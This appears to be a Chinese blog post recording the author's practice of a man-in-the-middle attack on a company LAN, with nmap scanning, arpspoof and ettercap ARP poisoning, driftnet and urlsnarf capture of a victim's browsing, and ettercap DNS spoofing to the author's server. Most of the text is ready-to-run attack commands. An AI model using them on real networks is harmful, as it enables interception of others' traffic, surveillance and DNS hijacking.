中间人攻击

正好在公司有机会玩玩内网渗透,于是实践一下中间人攻击
我所在的网段为10.0.100.0/24
攻击者主机IP:10.0.100.133
受害者主机IP:10.0.100.136
网关:10.0.100.1

扫描主机

先用nmap扫描看看目前内网中在使用的主机IP
使用命令

nmap -sS 10.0.100.*   //扫描整个网段中的主机情况,-sS为半开放扫描,扫描不容易被对方发现

中间人攻击_第1张图片

ARP毒化

使用arpspoof进行攻击

启用转发功能,linux的路由功能
此处设置为0时,arp欺骗后可以实现让对方断网

root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1

向受害者发送ARP欺骗冒充网关,IP转发关闭时这一步后目标主机就无法上网了

arpspoof -i eth0 -t 10.0.100.136 10.0.100.1

中间人攻击_第2张图片

向网关发送欺骗冒充受害者,有些网站上后面IP写成攻击者的IP,试了试好像也能成功,原因不清楚

arpspoof -i eth0 -t 10.0.100.1 10.0.100.136

中间人攻击_第3张图片
完成这两步后受害者主机与网关之间的流量都会经过攻击者电脑了,使用driftnet可以看到受害者浏览的图片

driftnet -i eth0 -ad ./drif 

driftnet,-i:选择网卡;-a:后台模式,图片保存在目录中不直接显示;-d:保存图片的路径
可以直接只指定网卡打开,即可不保存图片直接浏览,不过跳的很快看不见什么图就都过去了,建议使用上面的命令

driftnet -i eth0

用受害者电脑浏览网页后,攻击者电脑目录下即可看见受害者电脑浏览的图片
效果如下
中间人攻击_第4张图片

使用ettercap进行攻击
ettercap -i eth0 -Tq -M arp:remote /10.0.100.136// ///

不填写IP地址则默认对整个子网全部主机欺骗

ettercap -i eth0 -Tq -M arp:remote /// ///

-i, –iface #选择网卡
-T, –text #文本模式显示
-q, –quiet #安静模式,不显示嗅探数据
-M arp #ARP欺骗
remote #双向模式,同时arp欺骗通信的双方,参数 -M arp:remote
oneway #单向模式,只arp欺骗第一个目标到第二个目标的通信,参数 -M arp:oneway
之后就能使用driftnet查看受害者浏览的图片了,使用urlsnarf可以查看到受害者浏览的网页详细信息
中间人攻击_第5张图片
dsniff还有很多工具可以查看到被arp欺骗后的主机行为,后续再研究

DNS欺骗

arp欺骗之后可以继续进行dns欺骗,将目标主机向dns服务器发出的请求拦截,然后将解析的地址发送给目标主机。

ettercap实现dns欺骗
nano /etc/ettercap/etter.dns

用文本编辑器打开ettercap的dns文件
在最后加上

* A 10.0.100.132

这里10.0.100.132是我自己搭建的一个网站服务器,所有网页域名都解析为10.0.100.132这个地址

ettercap -T -i eth0 -q -P dns_spoof /10.0.100.136// ///

-P, –plugin #载入插件
这里加入了dns_spoof插件实现dns欺骗
不填ip则对子网中所有主机欺骗

受害者主机所有域名都被解析为10.0.100.132了

中间人攻击_第6张图片

中间人攻击_第7张图片
效果好像并不好,常用网站好像由于缓存原因劫持不了,虽然ping的时候都成功劫持了,浏览器上试有时候并不成功

你可能感兴趣的:(网络安全)